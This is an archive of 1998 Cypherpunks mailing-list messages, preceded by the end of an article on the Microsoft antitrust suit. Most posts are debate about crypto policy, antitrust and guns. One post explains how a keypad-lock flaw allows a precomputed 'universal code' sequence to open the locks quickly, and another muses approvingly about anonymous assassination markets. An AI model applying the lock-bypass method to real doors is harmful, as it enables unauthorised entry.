               when its quasi-monopoly looks secure, something
               new--Netscape's Web browsers, Sun Microsystems' Java
               programming language--pops up and makes Microsoft
               scramble to maintain its position. So far its resilience has
               served it well, but the critics' scary scenario relies on more than
               successful scrambling. It requires absolute security, no future
               challengers. And that looks unlikely.

               Consider the smoking gun memo cited by Assistant Attorney
               General Joel Klein at the press conference announcing the
               Justice Department suit. An internal Microsoft document, it
               told marketing managers to "Worry about the browser share as
               much as Bill Gates does, because we will lose the Internet
               platform battle if we do not have a significant user-installed
               base. The industry would simply ignore our standards. At
               your level, that is at the manager level, if you let customers
               deploy Netscape Navigator, you lose the leadership on the
               desktop."

               I will leave it to the attorneys to divine what it means not to "let
               customers deploy Netscape Navigator," but one thing is clear:
               This is not a company that thinks like a monopoly. It is always
               running scared. There's always the possibility that something
               new could come along and destroy its franchise.

               Microsoft didn't get where it is by creating perfect products. It
               benefited as much from its competitors' mistakes as from its
               own considerable acumen. And it isn't shy about leaning on
               suppliers and intermediate customers, such as computer
               makers, to get its way. In the eyes of its critics, its success is
               therefore proof that something is amiss in the marketplace.

               But the market doesn't promise perfection, only a
               trial-and-error process of discovery and improvement. The
               fallible human beings who create products make mistakes.
               They let their egos and preconceptions blind them to what
               people really want. Or they just don't know enough, or adjust
               fast enough, to produce the right goods at the right time. That
               some of Microsoft's strongest current competitors--Sun and
               Oracle--are gripped by an anti-PC ideology, when customers
               love the independence and flexibility of personal computers,
               does not bode well for them.

               What is striking about the story of Microsoft is how adaptable
               the company has been. Gates's original vision of "a computer
               on every desk and in every home, running Microsoft software"
               didn't specify what sort of software or who would make the
               computers. It was an open-ended, flexible idea that built a
               resilient company.

               What Microsoft has delivered is pretty much what most people
               want: a way to use computers easily, for many different
               purposes. Its software isn't always elegant, but that's the
               criterion of programming elites, not everyday users. And
               though Microsoft is clearly the big kid on the block, it has
               enabled, and encouraged, lots of other software developers.
               Microsoft accounts for a mere 4 percent of industry revenue. As
               Eamonn Sullivan of PC Week notes, "A lot of companies are
               making a lot of money on the ubiquity of Windows, providing
               users with a lot of choice where they want it--on their desktops.
               That isn't the expected result of a monopoly."

               From 1969 to 1982, the Justice Department carried on a similar
               trust-busting crusade against IBM, which had behaved in many
               ways just like Microsoft. (An earlier antitrust action against
               IBM had been settled by a consent decree in 1956.) Millions of
               dollars were transferred from the taxpayers and stockholders to
               lawyers and expert witnesses. Enormous amounts of brain
               power were dissipated. Having to monitor every action for
               possible legal ramifications further constipated IBM's
               already-centralized culture.

               The suit was a complete waste. Whatever quasi-monopoly IBM
               had was broken not by government enforcers but by obscure
               innovators, working on computer visions neither IBM nor the
               Justice Department's legions of lawyers had imagined. Big Blue
               is still big, though it's smaller than it once was. But nobody
               thinks it could control the world. The world, it seems, is
               beyond that sort of control.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brian B. Riley" <brianbr@together.net>
Date: Thu, 8 Jan 1998 11:03:53 +0800
To: "CypherPunks List" <cypherpunks@Algebra.COM>
Subject: Re: cypherpunks and guns
Message-ID: <199801080258.VAA23445@mx02.together.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

On 1/7/98 3:16 AM, Kent Crispin (kent@songbird.com)  passed this
wisdom:

>On Wed, Jan 07, 1998 at 01:25:45AM -0600, snow wrote:
>>I am fairly certain that as an irregular army soldier I could
>>inflict a substantial amount of damage upon an occupying military.
>>With maybe $20k in equipment and several hundred hours of training,
>>you could make
>> 
>> 	If you were smart, you could do it for a lot less. 
>
>That presumes the enemy is dumb.  An amusing fantasy.

 ... not so .... the US Military has very few really experienced
combat soldiers left and most of those are in places where their
experience isn't available to the grunt on the line. Most RVN vets are
retired ... look just recently at what happened to the Russians troops
sent to Chechnya ... all these brand spanking new, highly trained
proud young 19 and 20 year old troops went romping off to fight 'a
bunch of old men' in the Chechyn Republic ... there was one little
problem ... a big hunk of those old men had spent two to seven years
in that same Russian Army fighting the Mujahedeen in Afghanistan ...
and that 'bunch of old men' kicked their young asses!
-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.0
Charset: noconv

iQEVAwUBNLRAvD7r4fUXwraZAQHv5wf/S8j1et/Rf0LQu8eH4koWLjmSduaxggsY
VMGcY7z2OfLdSrtVAGIcLpfPPdrOk0utmH317xwKIL9SIQIqGYvm7pCdYSv0A4Vx
KD49W3pQjhvrhTHZldd8EFrd7Z2thfR1EJL9Vowsnyr4QHt5FvXrBs6k5531iNtN
TURAhCzVgpKuMruwwaKMVc+P72mYJl7OM2I2j6ZdEkZOPNxoCVS/0xO8UTlWpLUO
9Suxvi+rJSa4k/HKRsGUrRO/LaFK7abTs/AwLioJlyd5ukXjdPuyY2wza8h1GvC2
fowHb8WGYdcwc45FBhpz3bEiS/PU5t2xHQ9p+/mEkLDknfBSNk01zw==
=hiEs
-----END PGP SIGNATURE-----


Brian B. Riley --> http://members.macconnect.com/~brianbr
  For PGP Keys  <mailto:brianbr@together.net?subject=Get%20PGP%20Key>

  "In effect, to follow, not to force the public inclination; to give a
   direction, a form, a technical dress, and a specific sanction, to the
   general sense of the community, is the true end of legislature." 
       -- Edmund Burke






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Frantz <frantz@netcom.com>
Date: Thu, 8 Jan 1998 14:22:10 +0800
To: Declan McCullagh <cypherpunks@cyberpass.net
Subject: Re: Lessig on antitrust and government regulation
In-Reply-To: <Pine.GSO.3.95.980107124703.7420C-100000@well.com>
Message-ID: <v03110714b0da1dd2aee3@[207.94.249.133]>
MIME-Version: 1.0
Content-Type: text/plain



At 12:48 PM -0800 1/7/98, Declan McCullagh wrote:
>Lessig is the special master appointed by the judge in the Microsoft
>consent decree case. He once wrote:
>
>>Whether a regulation is
>>rational turns on the facts, and what counts as "the facts" turns on the
>>theory that animates inquiry into the facts.
>
>Wow.
>
>How do we know what theory is the right one, and when we should change it?

Theories are normally only changed when (1) it is obvious they no longer
reflect observed reality, and (2) they can't be patched anymore.  :-)

The Ptolemaic theory of the universe is the classic example.


-------------------------------------------------------------------------
Bill Frantz       | One party wants to control | Periwinkle -- Consulting
(408)356-8506     | what you do in the bedroom,| 16345 Englewood Ave.
frantz@netcom.com | the other in the boardroom.| Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alan@clueserver.org>
Date: Thu, 8 Jan 1998 14:44:01 +0800
To: Eric Cordian <emc@wire.insync.net>
Subject: Re: a good example of bad crypto hype
In-Reply-To: <3.0.5.32.19980107171614.007c4eb0@206.40.207.40>
Message-ID: <3.0.5.32.19980107221217.03fd76b0@clueserver.org>
MIME-Version: 1.0
Content-Type: text/plain



At 08:30 PM 1/7/98 -0600, Eric Cordian wrote:
>
>David Honig wrote:
>
>> at http://www.meganet.com/explain.htm
>> you can test your critical thinking skills...
>
>Clearly everyone in this company is on crack. :)

And they also seem to be members of the Society for Creative Anacronyms.

---
|              "That'll make it hot for them!" - Guy Grand               |
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|`finger -l alano@teleport.com` for PGP 2.6.2 key  | behind the keyboard.|
|         http://www.ctrl-alt-del.com/~alan/       |alan@ctrl-alt-del.com|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Tina (SingPing) Lai" <tyna@mystop.com>
Date: Thu, 8 Jan 1998 15:09:24 +0800
To: rambam@torah.org
Subject: [hey yall DO NOT delete this is the weirdest game....~!]]
Message-ID: <34B475DA.2E280EBF@mystop.com>
MIME-Version: 1.0
Content-Type: text/plain




To: Airheadlin@aol.com, SWeeTpny98@aol.com, Tlai@mystop.com
Subject: Fwd: hey yall DO NOT delete this is the weirdest game....~!]
From: Alyse4112 <Alyse4112@aol.com>
Date: Wed, 7 Jan 1998 21:06:34 EST
Organization: AOL (http://www.aol.com)



To: Alyse4112@aol.com, OhUSoSilly@aol.com, Ninavc@aol.com,swimgirl12@hotmail.com
Subject: Fwd:hey yall DO NOT delete this is the weirdest game....~!]
From: RayRay124 <RayRay124@aol.com>
Date: Tue, 6 Jan 1998 03:01:18 EST
Organization: AOL (http://www.aol.com)

In a message dated 98-01-05 22:49:10 EST, DimplesF56 writes:

<< 
 >>



To: RayRay124@aol.com, VHSmile@aol.com, nail@home.com, Sak14@aol.com,AZNPL8YBOY@aol.com, ARISTO20@aol.com, JILTED76@aol.com
Subject: Fwd: [Fwd: Fwd: hey yall DO NOT delete this is the weirdest game....~!]
From: DimplesF56 <DimplesF56@aol.com>
Date: Mon, 5 Jan 1998 22:49:10 EST
Organization: AOL (http://www.aol.com)



To: Helen Huang <Sweets637@AOL.COM>, Jenny Young <kbzxgqgirl@AOL.COM>,       Jonathan Woo <JWoo516@AOL.COM>, Margery Lee <Marg@ucla.edu>,       Musette Chan <Qui8cow@AOL.COM>, Steven Hu <Smartbeans@AOL.COM>,       Thyda Chhor <thyda001@AOL.COM>
Subject: [Fwd: Fwd: hey yall DO NOT delete this is the weirdest game....~!]
From: Kwan <kwan887@jps.net>
Date: Fri, 02 Jan 1998 09:09:45 -0800



To: Helen Huang <Sweets637@AOL.COM>, Jenny Young <kbzxgqgirl@AOL.COM>,       Jonathan Woo <JWoo516@AOL.COM>, Margery Lee <Marg@ucla.edu>,       Musette Chan <Qui8cow@AOL.COM>, Steven Hu <Smartbeans@AOL.COM>,       Thyda Chhor <thyda001@AOL.COM>
Subject: [Fwd: Fwd: hey yall DO NOT delete this is the weirdest game....~!]
From: Kwan <kwan887@jps.net>
Date: Fri, 02 Jan 1998 09:09:45 -0800



--------------------
Received: from imo18.mx.aol.com (imo18.mx.aol.com [198.81.19.175])
	by dry.jps.net (8.8.5/8.8.5) with ESMTP id TAA16198
	for <kwan887@jps.net>; Wed, 31 Dec 1997 19:15:10 -0800 (PST)
From: Bar111bie <Bar111bie@aol.com>
Message-ID: <2e2dd6f8.34ab0a14@aol.com>
Date: Wed, 31 Dec 1997 22:14:26 EST
To: kwan887@jps.net
Mime-Version: 1.0
Subject: Fwd: hey yall DO NOT delete this is the weirdest game....~!
Content-type: multipart/mixed;
	boundary="part0_883624466_boundary"
Organization: AOL (http://www.aol.com)
X-Mailer: Inet_Mail_Out (IMOv11)

This is a multi-part message in MIME format.

--part0_883624466_boundary
Content-ID: <0_883624466@inet_out.mail.aol.com.1>
Content-type: text/plain; charset=US-ASCII


--part0_883624466_boundary
Content-ID: <0_883624466@inet_out.mail.aol.com.2>
Content-type: message/rfc822
Content-transfer-encoding: 7bit
Content-disposition: inline

From: Babytimd13 <Babytimd13@aol.com>
Return-path: <Babytimd13@aol.com>
To: Bar111bie@aol.com
Subject: Fwd: hey yall DO NOT delete this is the weirdest game....~!
Date: Wed, 31 Dec 1997 03:42:58 EST
Organization: AOL (http://www.aol.com)
Mime-Version: 1.0
Content-type: multipart/mixed;
	boundary="part1_883624466_boundary"

--part1_883624466_boundary
Content-ID: <0_883624466@inet_out.mail.aol.com.3>
Content-type: text/plain; charset=US-ASCII


--part1_883624466_boundary
Content-ID: <0_883624466@inet_out.mail.aol.com.4>
Content-type: message/rfc822
Content-transfer-encoding: 7bit
Content-disposition: inline

From: Babytimd13 <Babytimd13@aol.com>
Return-path: <Babytimd13@aol.com>
To: Rndy2@aol.com
Subject: hey yall DO NOT delete this is the weirdest game....~!
Date: Mon, 29 Dec 1997 03:56:13 EST
Organization: AOL (http://www.aol.com)
Content-type: text/plain; charset=US-ASCII
Content-transfer-encoding: 7bit

In a message dated 97-12-28 19:03:18 EST, you write:

<< Begin...
 
 
 > =
 
 > First, write 1-11in a column.
 > Then in the first and second spaces, fill any two numbers you like.
 > Write two males names in the 3rd and 7th spaces.
 > Write anyone's name (like friends or family...) in the 4th, 5th, and
 >6th spaces.
 > Write four song titles in 8,9,10 and 11.
 > =
 
 > Finally, make a wish...
 > =
 
 > =
 
 > And here is the key for that game...
 > =
 
 > =
 
 >
 >
 >
 >
 >
 >
 >
 >You must tell (the number in space 2) people about this game in (the =
 
 >number in space 1) days in order to make your wish come true.
 > =
 
 > The name in 3 is the one you love.
 > The person in 7 is the one you like but can't work out.
 > You care most about the person you put in 4.
 > Fifth is the one you knows you very well.
 > The name in 6 is your lucky star.
 > The song in 8 is the song that matches with the person in 3.
 > The title in 9 is the song for 7.
 > The tenth space is the song telling you about your mind.
 > And 11 is the song telling what you feel for sex.......
 > = >>

--part1_883624466_boundary--

--part0_883624466_boundary--









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sergey Goldgaber <sergey@pelican.el.net>
Date: Thu, 8 Jan 1998 11:57:04 +0800
To: Kent Crispin <kent@songbird.com>
Subject: Re: Jim Bell... lives... on... in... Hollywood!
In-Reply-To: <19980101150542.36875@songbird.com>
Message-ID: <Pine.NEB.3.95.980107224343.3505B-100000@pelican.el.net>
MIME-Version: 1.0
Content-Type: text/plain



On Thu, 1 Jan 1998, Kent Crispin wrote:

> On Thu, Jan 01, 1998 at 09:52:20PM +1100, Julian Assange wrote:
> > 
> > Anyone noticed this before?
> 
> No.  But there are two obvious differences between this and the Bell 
> plan:  1) it's not anon; 2) you are explicitly barred from winning if 
> you contribute in any way to the death.

1 - Anonymity is technically feasable.

2 - This requirement is a legal necessity.  Otherwise, the organization
    may be seen as advocating murder.

Obviously, if the "Death Pool" was fully anonymous, there would be
no way to tell if the winner had contributed in any way to the death.

Thus, I think we may be well on our way to Assasination Politics.

 - Sergey Goldgaber





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Rogaski <wendigo@ne-wendigo.jabberwock.org>
Date: Thu, 8 Jan 1998 12:30:41 +0800
To: honig@otc.net
Subject: Re: a good example of bad crypto hype
In-Reply-To: <3.0.5.32.19980107171614.007c4eb0@206.40.207.40>
Message-ID: <199801080419.XAA13414@deathstar.jabberwock.org>
MIME-Version: 1.0
Content-Type: text



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

An entity claiming to be David Honig wrote:

: 	
: at http://www.meganet.com/explain.htm
: you can test your critical thinking skills...
: 

- From the first paragraph, which offers this indisputable nugget:

  "At no point in time does the ORIGINAL DATA 
   ever gets encrypted or transferred
   in any form or shape."

I haven't laughed so hard in a long time.  And the grammar adds an even
better tinge to the spiel.

- -- 
[] Mark Rogaski                   "That which does not kill me
[] wendigo@pobox.com                 only makes me stranger."
[]
[]      finger wendigo@deathstar.jabberwock.org for PGP key
[] anti spambot: postmaster@localhost abuse@localhost uce@ftc.gov

-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.0
Charset: noconv

iQA/AwUBNLRT5piFNf283WlHEQJs7gCg2dNjMxE8A/IDL7Tv8wKzPd2/LBMAn3ZZ
IDnY6wp9N0ncZZAwd/wv9TAQ
=hYW8
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Thu, 8 Jan 1998 08:38:27 +0800
To: billp@nmol.com
Subject: brute forcing combination locks (Re: Bruce Schneier, Sandia, FBI and the REAL WORLD)
In-Reply-To: <34B3DFB4.6396@nmol.com>
Message-ID: <199801072324.XAA00540@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain




Bill Payne <billp@nmol.com> writes:
> Bruce Schneier wrote 
>
>    and a burglar willing to try all 10,000 is guaranteed to break 
>    into your house.
> 
> Sandia employees Jack Hudson and Jack Menako, both in my division
> when Sandia transferred me to break electronic locks for the FBI/ERF
> [Engineering Research Facility, Quantico, VA], were TRYING to 
> defeat combination locks on file cabinets.
> 
> Menako built a frame to connect a stepper-motor to the combination
> dial.
> 
> The stepper motor was wried to a PC.
> 
> Hudson wrote the software to try all possible combinations.
> 
> What happened, IN FACT, was that the combination lock wore-out
> before the combination which opened the lock was reached.
> 
> Combinations locks are NOT ENGINEERED for such heavy use.

Interesting.

When I was at [x] they had (and still do I think, hence obscuring
name!) 0-9 digit key pad combination locks.  I noticed by just
casually using various permutations each time I used the locks that
there was something anomalous about the way the key pads worked.  If
the code was 6789 you could get in by typing 56789, or by typing
456789 etc.

Clearly this gives you almost a 4 x reduction in the search space.

So I hacked up some code to compute the minimal universal door entry
sequence number.  Joy of joys the "universal code" as it was dubbed
fitted easily on 1/2 a sheet of A4 paper at 66 lines by 80 characters
per line, and we figured (myself and entertained colleagues) with
semi-covert experimentation that with a bit of practice you could
break a lock in around 10 mins manually or something like that.  It
looked quite esthetically pleasing also.

The sequence looked something like this:

01234567890124568902346780...

which would try combinations in this sequence:

0123
1234
2345
3456
4567
5678
6789
7890
8901
9012
0124
1245
2456
4568
5689
6890
8902
9023
0234
2346
3467
4678
6780
...

I was not able to do it quite the theoretical minimal number of
permutations of 2503, but it was only 3 or 4 extra digits I think.  I
am not sure if you could do better than this, but it was a
computational trade off, my algorithm was recursive, and back tracked
as it was; I just chopped it off and demanded best solution after 1
hours CPU or whatever.

I might have the universal code and source code around somewhere,
can't lay my hands on it right now.

We dubbed this sheet of paper the "universal door code", and
considered pinning it beside the lock :-)

These locks looked pretty cheap, and didn't suffer the mechanical
failure problem you describe, we probably gave them enough stress
testing in our semi-covert experiments.

Also it occurs to me that a duty cycle of 10k operations isn't that
high.  I am left wondering if perhaps you were pushing the units too
hard -- would you have been able to break the lock before mechanical
failure if you had slowed the rotation rate of your mechanical dial
turner?  Also, perhaps your mechanical setup was too rough, putting
abnormal strain through clunky motion or something?


Also, in fact these 0-9 digit 4 digit locks at [x] I think had other
problems also, under certain circumstances you were able to type a
spurious digit between the digits of the 4 digit code (eg code is
1234, typing 15234 would let you in!)  If we had been able to find a
rule governing this behaviour, an even shorter universal code would
have been obtainable.  However it seemed erratic, and interest waned
around this point somewhere.

They also had a few hex versions with 0-9A-F and 4 digits, which I
also calculated a universal code for.  They seemed not vulnerable to
the spurious digit flaw described in the above paragraph of the 0-9
units.

Adam
-- 
Now officially an EAR violation...
Have *you* exported RSA today? --> http://www.dcs.ex.ac.uk/~aba/rsa/

print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<J]dsJxp"|dc`





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Thu, 8 Jan 1998 15:53:38 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: best body armor for cypherpunks [serious] (fwd)
In-Reply-To: <199801050513.XAA22310@einstein.ssz.com>
Message-ID: <3.0.5.32.19980107234753.00845350@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



>> What is, in your opinion, the best (price and performance-wise)
>> body armor for cypherpunks?

Anonymity, of course .....


				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Thu, 8 Jan 1998 16:16:14 +0800
To: cypherpunks@toad.com
Subject: Re: [Humor] Kennedy's New Legislation
In-Reply-To: <v03007800b0d6d4af2e4b@[204.254.22.20]>
Message-ID: <3.0.5.32.19980108000200.0084fab0@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



At 07:19 PM 1/5/98 EST, Dr.Dimitri Vulis KOTM wrote:
>"Evolution in action."
>Thank you, Michael Kennedy, for improving humanity's gene pool.

It's only evolution in action if it gets them before they've reproduced...

				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Thu, 8 Jan 1998 08:37:42 +0800
To: frantz@netcom.com
Subject: Re: Silly Shrinkwrapped Encryption
In-Reply-To: <v0311070eb0d8be53e6a8@[207.94.249.133]>
Message-ID: <199801080006.AAA00669@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain




Bill Frantz <frantz@netcom.com> writes:
> 
> [lotus notes 24+40 GAK design]
> 
> It seems to me that if you step on the correct part of the message, you zap
> the encrypted 24 bits, and cut NSA out of the loop.  Of course the receiver
> could notice and refuse to decrypt, which would require some software
> hacking to defeat, but that is certainly doable.

Well if that were all they were doing you could just fill it with
random numbers, or encrypt the wrong 24 bits of random data with the
NSA's public key, etc. and the receiving software couldn't tell
without access to DIRNSA's private GAKking key.

However, I figure that they could do this... encrypt to the recipient
and include in the GAK packet the RSA padding used to encrypt the 24
bits.

The recipient gets the 24 bits anyway because he can decrypt the main
recipient field; with the padding he can re-create the RSA encrypted
GAK packet.

Not that we want to help the GAKkers or anything :-)

Still as you say even that would likely be a single byte patch or
whatever to skip the test.

Also as William notes, don't use the crap -- it's only 64 bits anyway
even for non-export version, and their reputed motives in smoothing a
path to domestic GAK, and even in buying into the KRAP program might
be enough to move some to boycott them even if there crypto key sizes
were reasonable, which they are not.

Adam
-- 
Now officially an EAR violation...
Have *you* exported RSA today? --> http://www.dcs.ex.ac.uk/~aba/rsa/

print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<J]dsJxp"|dc`





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "snow" <snow@smoke.suba.com>
Date: Thu, 8 Jan 1998 14:38:21 +0800
To: kent@songbird.com (Kent Crispin)
Subject: Re: cypherpunks and guns
In-Reply-To: <19980107001651.29456@songbird.com>
Message-ID: <199801080635.AAA01419@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain



> On Wed, Jan 07, 1998 at 01:25:45AM -0600, snow wrote:
> > > I am fairly certain that as an irregular army soldier I could inflict
> > > a substantial amount of damage upon an occupying military.  With maybe
> > > $20k in equipment and several hundred hours of training, you could make
> > 	If you were smart, you could do it for a lot less. 
> That presumes the enemy is dumb.  An amusing fantasy.

	No, just that one could bootstrap your fight for a lot less.

	As long as cops have guns and piano wire is unrestricted, ruthless
people will always have access to guns. 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Costner" <pooh@efga.org>
Date: Thu, 8 Jan 1998 14:01:03 +0800
To: cypherpunks@toad.com
Subject: Remailers & N.E.T.
In-Reply-To: <2257f75e9d4378c573ebe49c9a1d7acc@anon.efga.org>
Message-ID: <3.0.3.32.19980108004628.03b6bbe8@mail.atl.bellsouth.net>
MIME-Version: 1.0
Content-Type: text/plain



Perhaps the use of a remailer for this message below is an attempt to
escape the criminal provisions of the No Electronic Theft Act.

>From: Anonymous <anon@anon.efga.org>
>Comments: This message did not originate from the Sender address above.
>	It was remailed automatically by anonymizing remailer software.
>	Please report problems or inappropriate use to the
>	remailer administrator at <admin@anon.efga.org>.
>To: cypherpunks@toad.com
>Sender: owner-cypherpunks@cyberpass.net
>Reply-To: Anonymous <anon@anon.efga.org>
>X-Loop: cypherpunks@cyberpass.net
>
>               Creative Insecurity 
>               The complicated truth behind the rise of Microsoft 
>
>               By Virginia I. Postrel 
>
>               Back in 1983, Forbes ran an article called "If they're so






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <gbroiles@netbox.com>
Date: Thu, 8 Jan 1998 17:52:31 +0800
To: declan@well.com
Subject: Re: Question on U.S. Postal Service and crypto (fwd)
In-Reply-To: <Pine.BSF.3.91.980108013649.17927B-100000@gabber.c2.net>
Message-ID: <3.0.2.32.19980108014945.006c9910@pop.sirius.com>
MIME-Version: 1.0
Content-Type: text/plain



>This is for a story for Time on the "new" U.S .Postal Service. I vaguely
>recall the USPS trying to set digital signature standards and/or serve as
>a CA. I'd like to mention this.
>
>Can't remember the details, though. Does anyone have 'em (or a pointer to
>them) handy?

See <http://www.parrhesia.com/po-ca.html> for information about the USPS'
plan to act as a CA.


--
Greg Broiles                | US crypto export control policy in a nutshell:
gbroiles@netbox.com         | Export jobs, not crypto.
http://www.io.com/~gbroiles | http://www.parrhesia.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jalonz@openworld.com
Date: Thu, 8 Jan 1998 15:48:36 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <85256586.0029E630.00@openworld.com>
MIME-Version: 1.0
Content-Type: text/plain




>#   SAN DIEGO DISTRICT ATTORNEY'S OFFICE.
>#
>#   Computer Security - Provide computer security assistance in criminal
>#   investigations.  Tasks include data decryption, recovering erased
data,
>#   password retrieval, data line monitoring, and protected system entry.
>
>Isn't that last item special?
>
>---guy
>
>   And a possible reason for heading the other way.

guy,

tough noogies

deal with it...

Notice the words "criminal investigations"? God forbid talent could
actually be used for a good cause. The incidents in question were actually
quite serious (Chinese mafia money laundering via phony real estate deals)
and not at all like the porno bbs confiscation crap you'd be thinking of.

Besides the DA office reference (I can completely understand about that
one), which was consulting work, what's your point in laying someone's life
out on a page? Who cares? Yeah, its a lot of stuff, I just happen to work
for start-up companies and thus I jump around a lot - given that most of
them never make it due to one problem or another.

:)
jqz






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Costner" <pooh@efga.org>
Date: Thu, 8 Jan 1998 17:23:10 +0800
To: Declan McCullagh <declan@well.com>
Subject: Re: Question on U.S. Postal Service and crypto
In-Reply-To: <Pine.GSO.3.95.980106134209.22930S-100000@well.com>
Message-ID: <3.0.3.32.19980108035645.037abe0c@mail.atl.bellsouth.net>
MIME-Version: 1.0
Content-Type: text/plain



At 02:07 PM 1/6/98 -0800, Declan McCullagh wrote:
>This is for a story for Time on the "new" U.S .Postal Service. I vaguely
>recall the USPS trying to set digital signature standards and/or serve as
>a CA. I'd like to mention this.
>
>Can't remember the details, though. Does anyone have 'em (or a pointer to
>them) handy?

A few months back I asked a USPS rep about this, and was told that the idea
had been scrapped.  I do not know that this was correct.  The USPS was
going to do timestamping as well as act as a CA as I recall.  The
timestamping is a action that "postmarks" the digitally signed message.
Many attorneys feel this is a very good thing, though I have had a hard
time justifying the need for this to some technically inclined people.

Try "digital postmark" in yahoo.
http://www.aegisstar.com/uspsepm.html
http://xent.ics.uci.edu/FoRK-archive/fall96/0328.html

An interesting feature of the digital postmark is that the USPS was making
the claim that if you receive an email that the USPS send to you that was
not meant for you, then you have committed a federal crime when you read it.

Additional timestamping services are available perhaps from Pitney Bowes,
Arthur Anderson, and http://www.itconsult.co.uk/stamper.htm.  My memory on
this fails me.  


  -- Robert Costner                  Phone: (770) 512-8746
     Electronic Frontiers Georgia    mailto:pooh@efga.org  
     http://www.efga.org/            run PGP 5.0 for my public key





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mix <mixmaster@remail.obscura.com>
Date: Thu, 8 Jan 1998 20:25:32 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199801081204.EAA28274@sirius.infonex.com>
MIME-Version: 1.0
Content-Type: text/plain



Tim C. May's reheated, refurbished, and regurgitated cud is 
completely inappropriate for the mailing lists into which it is 
cross-ruminated.

   |     |
   |  O  | Tim C. May
   (--|--)
      |
     / \





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Thu, 8 Jan 1998 21:25:52 +0800
To: cypherpunks@toad.com
Subject: Re: rant on the morality of confidentiality
In-Reply-To: <md5:2F4707F94158BBCDE58F1FC30140DD96>
Message-ID: <34B4CFF0.858FF03C@acm.org>
MIME-Version: 1.0
Content-Type: text/plain



Vladimir Z. Nuri wrote:
> scientists who agree to government secrecy to develop
> their inventions are agreeing to a lot more than
> mere secrecy. they are committing to a paradigm that
> is at odds with science itself, which only advances through
> the open literature.

Why limit your annoyance to government scientists?  Scientists
in private industry are in the same position, developing (e.g.)
algorithms and analytical methods protected by trade secrets.
Society recognizes this tendency and tries to advance science
anyway by offering patent protection.  You don't make money by
giving away your intellectual capital.  Seems to me that schools
and independently wealthy scientists/foundations are the only
ones who don't merit your censure on this count.
-- 
	Jim Gillogly
	Trewesday, 17 Afteryule S.R. 1998, 13:04
	12.19.4.14.17, 1 Caban 15 Kankin, Ninth Lord of Night





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com (James A. Donald)
Date: Thu, 8 Jan 1998 13:57:59 +0800
To: cypherpunks@toad.com
Subject: Announcing Crypto Kong, Release Candidate Two.
Message-ID: <199801080543.VAA21873@proxy3.ba.best.com>
MIME-Version: 1.0
Content-Type: text/plain



    --
Announcing Crypto Kong, Release Candidate Two.

http://www.jim.com/jamesd/Kong

please test.

Crypto Kong, like PGP, provides digital signatures and
communications encryption.

The important difference between it and other products that
provide digital signatures and encryption is that it is not
certificate based.  Instead it is signature based.

This eliminates the steep initial learning and management
curves  of existing products.  The user does not need use and
manage  specialized certificates except for specialized
purposes

Perhaps more importantly, it also eliminates the threat we 
saw in England, the threat of the government giving itself a
monopoly in certificate distribution, potentially creating
the  Number-Of-The-Beast system, where you need a government 
certificate to log on to dirty picture sites, to buy, to 
sell, to put up web pages.

The big complexity and user hostility in existing products is 
creating and managing certificates.

For those who need contracts and certificates, (and with Kong
one almost never needs certificates) Kong handles them in an
easy and natural way.

See the discussion in the web site in the chapters:
     Linking digital IDs with paper documents or physical
     presence
and
     Certificates and contracts 

This aspect of Kong seems to have been insufficiently tested
in the beta tests.

 The key feature of the proposed product is that any
digitally  signed document can be stored in the database, and
